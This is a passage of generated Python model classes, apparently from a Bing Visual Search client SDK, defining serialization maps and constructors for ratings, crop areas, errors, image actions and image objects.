'rating_value': {'key': 'ratingValue', 'type': 'float'},
'best_rating': {'key': 'bestRating', 'type': 'float'},
}
_subtype_map = {
'type': {'AggregateRating': 'AggregateRating'}
}
def __init__(
self,
**kwargs
):
super(Rating, self).__init__(**kwargs)
self.type = 'Rating' # type: str
self.rating_value = kwargs['rating_value']
self.best_rating = None
class AggregateRating(Rating):
"""Defines the metrics that indicate how well an item was rated by others.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar text: Text representation of an item.
:vartype text: str
:param type: Required. Constant filled by server.
:type type: str
:param rating_value: Required. The mean (average) rating. The possible values are 1.0 through
5.0.
:type rating_value: float
:ivar best_rating: The highest rated review. The possible values are 1.0 through 5.0.
:vartype best_rating: float
:ivar review_count: The number of times the recipe has been rated or reviewed.
:vartype review_count: int
"""
_validation = {
'text': {'readonly': True},
'type': {'required': True},
'rating_value': {'required': True},
'best_rating': {'readonly': True},
'review_count': {'readonly': True},
}
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'rating_value': {'key': 'ratingValue', 'type': 'float'},
'best_rating': {'key': 'bestRating', 'type': 'float'},
'review_count': {'key': 'reviewCount', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(AggregateRating, self).__init__(**kwargs)
self.type = 'AggregateRating' # type: str
self.review_count = None
class CropArea(msrest.serialization.Model):
"""A JSON object consisting of coordinates specifying the four corners of a cropped rectangle within the input image.
All required parameters must be populated in order to send to Azure.
:param top: Required. The top coordinate of the region to be cropped. The coordinate is a
fractional value of the original image's height and is measured from the top edge of the image.
Specify the coordinate as a value from 0.0 through 1.0.
:type top: float
:param bottom: Required. The bottom coordinate of the region to be cropped. The coordinate is a
fractional value of the original image's height and is measured from the top edge of the image.
Specify the coordinate as a value from 0.0 through 1.0.
:type bottom: float
:param left: Required. The left coordinate of the region to be cropped. The coordinate is a
fractional value of the original image's width and is measured from the left edge of the image.
Specify the coordinate as a value from 0.0 through 1.0.
:type left: float
:param right: Required. The right coordinate of the region to be cropped. The coordinate is a
fractional value of the original image's width and is measured from the left edge of the image.
Specify the coordinate as a value from 0.0 through 1.0.
:type right: float
"""
_validation = {
'top': {'required': True},
'bottom': {'required': True},
'left': {'required': True},
'right': {'required': True},
}
_attribute_map = {
'top': {'key': 'top', 'type': 'float'},
'bottom': {'key': 'bottom', 'type': 'float'},
'left': {'key': 'left', 'type': 'float'},
'right': {'key': 'right', 'type': 'float'},
}
def __init__(
self,
**kwargs
):
super(CropArea, self).__init__(**kwargs)
self.top = kwargs['top']
self.bottom = kwargs['bottom']
self.left = kwargs['left']
self.right = kwargs['right']
class Error(msrest.serialization.Model):
"""Defines the error that occurred.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param code: Required. The error code that identifies the category of error. Possible values
include: "None", "ServerError", "InvalidRequest", "RateLimitExceeded", "InvalidAuthorization",
"InsufficientAuthorization". Default value: "None".
:type code: str or ~visual_search_client.models.ErrorCode
:ivar sub_code: The error code that further helps to identify the error. Possible values
include: "UnexpectedError", "ResourceError", "NotImplemented", "ParameterMissing",
"ParameterInvalidValue", "HttpNotAllowed", "Blocked", "AuthorizationMissing",
"AuthorizationRedundancy", "AuthorizationDisabled", "AuthorizationExpired".
:vartype sub_code: str or ~visual_search_client.models.ErrorSubCode
:param message: Required. A description of the error.
:type message: str
:ivar more_details: A description that provides additional information about the error.
:vartype more_details: str
:ivar parameter: The parameter in the request that caused the error.
:vartype parameter: str
:ivar value: The parameter's value in the request that was not valid.
:vartype value: str
"""
_validation = {
'code': {'required': True},
'sub_code': {'readonly': True},
'message': {'required': True},
'more_details': {'readonly': True},
'parameter': {'readonly': True},
'value': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'sub_code': {'key': 'subCode', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'more_details': {'key': 'moreDetails', 'type': 'str'},
'parameter': {'key': 'parameter', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Error, self).__init__(**kwargs)
self.code = kwargs.get('code', "None")
self.sub_code = None
self.message = kwargs['message']
self.more_details = None
self.parameter = None
self.value = None
class ErrorResponse(Response):
"""The top-level response that represents a failed request.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:param errors: Required. A list of errors that describe the reasons why the request failed.
:type errors: list[~visual_search_client.models.Error]
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'errors': {'required': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'errors': {'key': 'errors', 'type': '[Error]'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.errors = kwargs['errors']
class Filters(msrest.serialization.Model):
"""A key-value object consisting of filters that may be specified to limit the results returned by the API. Current available filters: site.
:param site: The URL of the site to return similar images and similar products from. (e.g.,
"www.bing.com", "bing.com").
:type site: str
"""
_attribute_map = {
'site': {'key': 'site', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Filters, self).__init__(**kwargs)
self.site = kwargs.get('site', None)
class ImageAction(Action):
"""Defines an image action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ImageAction, self).__init__(**kwargs)
self.action_type = None
class ImageEntityAction(ImageAction):
"""Defines an entity action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ImageEntityAction, self).__init__(**kwargs)
class ImageInfo(msrest.serialization.Model):
"""A JSON object that identities the image to get insights of . It also includes the optional crop area that you use to identify the region of interest in the image.
:param image_insights_token: An image insights token. To get the insights token, call one of
the Image Search APIs (for example, /images/search). In the search results, the `Image
<https://docs.microsoft.com/en-us/bing/bing-visual-search/overview>`_ object's
`imageInsightsToken <https://docs.microsoft.com/en-us/bing/bing-visual-search/overview>`_ field
contains the token. The imageInsightsToken and url fields mutually exclusive; do not specify
both. Do not specify an insights token if the request includes the image form data.
:type image_insights_token: str
:param url: The URL of the input image. The imageInsightsToken and url fields are mutually
exclusive; do not specify both. Do not specify the URL if the request includes the image form
data.
:type url: str
:param crop_area: A JSON object consisting of coordinates specifying the four corners of a
cropped rectangle within the input image. Use the crop area to identify the region of interest
in the image. You can apply the crop area to the images specified using the imageInsightsToken
or url fields, or an image binary specified in an image form data.
:type crop_area: ~visual_search_client.models.CropArea
"""
_attribute_map = {
'image_insights_token': {'key': 'imageInsightsToken', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'crop_area': {'key': 'cropArea', 'type': 'CropArea'},
}
def __init__(
self,
**kwargs
):
super(ImageInfo, self).__init__(**kwargs)
self.image_insights_token = kwargs.get('image_insights_token', None)
self.url = kwargs.get('url', None)
self.crop_area = kwargs.get('crop_area', None)
class ImageKnowledge(Response):
"""Defines a visual search API response.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar tags: A set of tags. A list of visual search tags.
:vartype tags: list[~visual_search_client.models.ImageTag]
:ivar image: Image object containing metadata about the requested image.
:vartype image: ~visual_search_client.models.ImageObject
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'tags': {'readonly': True},
'image': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'tags': {'key': 'tags', 'type': '[ImageTag]'},
'image': {'key': 'image', 'type': 'ImageObject'},
}
def __init__(
self,
**kwargs
):
super(ImageKnowledge, self).__init__(**kwargs)
self.tags = None
self.image = None
class ImageModuleAction(ImageAction):
"""Defines an image list action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
:ivar data: A list of images.
:vartype data: ~visual_search_client.models.ImagesModule
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
'data': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
'data': {'key': 'data', 'type': 'ImagesModule'},
}
def __init__(
self,
**kwargs
):
super(ImageModuleAction, self).__init__(**kwargs)
self.data = None
class MediaObject(CreativeWork):
"""Defines a media object.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar content_url: Original URL to retrieve the source (file) for the media object (e.g., the
source URL for the image).
:vartype content_url: str
:ivar host_page_url: URL of the page that hosts the media object.
:vartype host_page_url: str
:ivar content_size: Size of the media object content. Use format "value unit" (e.g., "1024 B").
:vartype content_size: str
:ivar encoding_format: Encoding format (e.g., png, gif, jpeg, etc).
:vartype encoding_format: str
:ivar host_page_display_url: Display URL of the page that hosts the media object.
:vartype host_page_display_url: str
:ivar width: The width of the media object, in pixels.
:vartype width: int
:ivar height: The height of the media object, in pixels.
:vartype height: int
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'content_url': {'readonly': True},
'host_page_url': {'readonly': True},
'content_size': {'readonly': True},
'encoding_format': {'readonly': True},
'host_page_display_url': {'readonly': True},
'width': {'readonly': True},
'height': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'content_url': {'key': 'contentUrl', 'type': 'str'},
'host_page_url': {'key': 'hostPageUrl', 'type': 'str'},
'content_size': {'key': 'contentSize', 'type': 'str'},
'encoding_format': {'key': 'encodingFormat', 'type': 'str'},
'host_page_display_url': {'key': 'hostPageDisplayUrl', 'type': 'str'},
'width': {'key': 'width', 'type': 'int'},
'height': {'key': 'height', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(MediaObject, self).__init__(**kwargs)
self.content_url = None
self.host_page_url = None
self.content_size = None
self.encoding_format = None
self.host_page_display_url = None
self.width = None
self.height = None
class ImageObject(MediaObject):
"""Defines an image.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar content_url: Original URL to retrieve the source (file) for the media object (e.g., the
source URL for the image).
:vartype content_url: str
:ivar host_page_url: URL of the page that hosts the media object.
:vartype host_page_url: str
:ivar content_size: Size of the media object content. Use format "value unit" (e.g., "1024 B").
:vartype content_size: str
:ivar encoding_format: Encoding format (e.g., png, gif, jpeg, etc).
:vartype encoding_format: str
:ivar host_page_display_url: Display URL of the page that hosts the media object.
:vartype host_page_display_url: str
:ivar width: The width of the media object, in pixels.
:vartype width: int
:ivar height: The height of the media object, in pixels.
:vartype height: int
:ivar thumbnail: The URL to a thumbnail of the image.
:vartype thumbnail: ~visual_search_client.models.ImageObject
:ivar image_insights_token: The token that you use in a subsequent call to Visual Search API to
get additional information about the image. For information about using this token, see the
imageInsightsToken field inside the knowledgeRequest request parameter.
:vartype image_insights_token: str
:ivar insights_metadata: A count of the number of websites where you can shop or perform other
actions related to the image. For example, if the image is of an apple pie, this object
includes a count of the number of websites where you can buy an apple pie. To indicate the
number of offers in your UX, include badging such as a shopping cart icon that contains the
count. When the user clicks on the icon, use imageInsightsToken in a subsequent Visual Search
API call to get the list of shopping websites.
:vartype insights_metadata: ~visual_search_client.models.ImagesImageMetadata
:ivar image_id: Unique Id for the image.
:vartype image_id: str
:ivar accent_color: A three-byte hexadecimal number that represents the color that dominates
the image. Use the color as the temporary background in your client until the image is loaded.
:vartype accent_color: str
:ivar visual_words: For internal use only.
:vartype visual_words: str
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'content_url': {'readonly': True},
'host_page_url': {'readonly': True},
'content_size': {'readonly': True},
'encoding_format': {'readonly': True},
'host_page_display_url': {'readonly': True},
'width': {'readonly': True},
'height': {'readonly': True},
'thumbnail': {'readonly': True},
'image_insights_token': {'readonly': True},
'insights_metadata': {'readonly': True},
'image_id': {'readonly': True},
'accent_color': {'readonly': True},
'visual_words': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'content_url': {'key': 'contentUrl', 'type': 'str'},
'host_page_url': {'key': 'hostPageUrl', 'type': 'str'},
'content_size': {'key': 'contentSize', 'type': 'str'},
'encoding_format': {'key': 'encodingFormat', 'type': 'str'},
'host_page_display_url': {'key': 'hostPageDisplayUrl', 'type': 'str'},
'width': {'key': 'width', 'type': 'int'},
'height': {'key': 'height', 'type': 'int'},
'thumbnail': {'key': 'thumbnail', 'type': 'ImageObject'},
'image_insights_token': {'key': 'imageInsightsToken', 'type': 'str'},
'insights_metadata': {'key': 'insightsMetadata', 'type': 'ImagesImageMetadata'},
'image_id': {'key': 'imageId', 'type': 'str'},
'accent_color': {'key': 'accentColor', 'type': 'str'},
'visual_words': {'key': 'visualWords', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ImageObject, self).__init__(**kwargs)
self.thumbnail = None
self.image_insights_token = None
self.insights_metadata = None
self.image_id = None
self.accent_color = None
self.visual_words = None
class ImageRecipesAction(ImageAction):
"""Defines an recipe action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
:ivar data: A list of recipes related to the image.
:vartype data: ~visual_search_client.models.RecipesModule
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
'data': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
'data': {'key': 'data', 'type': 'RecipesModule'},
}
def __init__(
self,
**kwargs
):
super(ImageRecipesAction, self).__init__(**kwargs)
self.data = None
class ImageRelatedSearchesAction(ImageAction):
"""Defines an related search action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
